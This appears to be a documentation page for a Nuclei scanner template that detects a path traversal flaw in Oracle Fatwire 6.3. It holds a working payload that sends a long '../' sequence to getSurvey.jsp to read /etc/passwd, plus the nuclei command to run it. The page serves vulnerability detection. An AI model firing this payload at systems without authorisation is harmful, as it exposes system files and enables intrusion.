Oracle Fatwire 6.3 - Path Traversal
ID: oracle-fatwire-lfi
Severity: high
Author: Bernardo Rodrigues @bernardofsr
Tags: lfi,oracle,fatwire,edb
Description
Section titled “Description”Oracle Fatwire 6.3 suffers from a path traversal vulnerability in the getSurvey.jsp endpoint.
YAML Source
Section titled “YAML Source”id: oracle-fatwire-lfi
info: name: Oracle Fatwire 6.3 - Path Traversal author: Bernardo Rodrigues @bernardofsr severity: high description: | Oracle Fatwire 6.3 suffers from a path traversal vulnerability in the getSurvey.jsp endpoint. reference: - https://www.exploit-db.com/exploits/50167 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cwe-id: CWE-22 metadata: max-request: 1 tags: lfi,oracle,fatwire,edb
http: - method: GET path: - "{{BaseURL}}/cs/career/getSurvey.jsp?fn=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:"
- type: status status: - 200# digest: 490a004630440220411edd974e874758b46fb20e492980c196125f3cc8bdf49eea098b7869b65f6802202cb3b3f6f963ae06449b6863a2e21af5dfc7057f13ae0316f9dfca6ae38c4a66:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/other/oracle-fatwire-lfi.yaml"